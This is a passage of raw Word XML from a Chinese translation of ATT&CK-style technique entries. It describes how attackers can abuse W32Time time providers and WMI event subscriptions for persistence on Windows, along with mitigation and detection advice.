              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，二进制文件元数据，动态链接库监控，文件监控，已加载动态链接库，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13E66B28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Scott Lundgren</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>@5twenty9</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Carbon Black</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09A989D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C1C2BF0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FCE8D2C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W32Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间服务）支持域间和域内的时间同步。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> W32Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间提供程序负责从硬件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络资源中检索时间戳并将这些值输出到其他网络客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120ABBE9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>时间提供程序实现为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>的子项中注册的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D794D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在服务控制管理器的指导下，时间提供程序管理器在系统启动时和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或在参数更改时加载并启动此项下列出并启用的时间提供程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975C29D" w14:textId="6CF90757" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会滥用此架构来建立</w:t>
      </w:r>
      <w:r w:rsidR="008F7150">
        <w:t>持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，特别是通过注册和启用恶意动态库来作为时间提供程序。时间提供程序需要管理员权限才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务账号权限运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B7D7F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3252"/>
        <w:gridCol w:w="6484"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00216056" w14:paraId="1BC34A12" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="18E47A18" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00216056" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00216056">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="102CA504" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00216056" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00216056">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="32D42219" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DFD502F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId90" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>文件和目录权限</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69F9E507" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>考虑使用组策略来配置和阻止对</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">W32Time </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库的添加</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="3BFD0D83" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="632"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F2CE9C8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4911692F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请考虑使用组策略来配置和阻止对注册表中</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W32Time</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>参数的修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75FC2178" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649CF25A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740A46FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立基线值</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>并</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析注册表中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W32Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息修改相关的活动，包括调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RegCreateKeyEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RegSetValueEx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）以及执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W32TM.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序。自定义时间提供程序注册的数量没有限制，尽管每个都可能需要将动态链接库</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有效负载写入磁盘</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951CE52" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具来分析自动启动位置，包括列为时间提供程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>动态链接库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B87DF8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>订阅</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4E651F15" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC5443F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1084</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43D804B8" w14:textId="549A9CB7" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5139ECF8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3644D60A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D3FF59" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>WMI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对象</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24F7B846" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="186657AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293E42AB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Management Instrumentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）可用于安装事件筛选器、提供程序、使用者和绑定，它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>都在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义的事件发生时执行代码。攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能来订阅事件并在事件发生时执行任意代码，从而在系统上实现持久性。攻击者可能会试图通过编译</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本来逃避对此技术的检测。可订阅的事件示例有挂钟时间或计算机的正常运行时间。据报道，有几个威胁组织使用这种技术来保持持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54906426" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00EF1D67" w14:paraId="3B73949F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="425EF154" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4F5CF017" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00EF1D67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1D67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="20D9DAAE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C1971AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId91" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
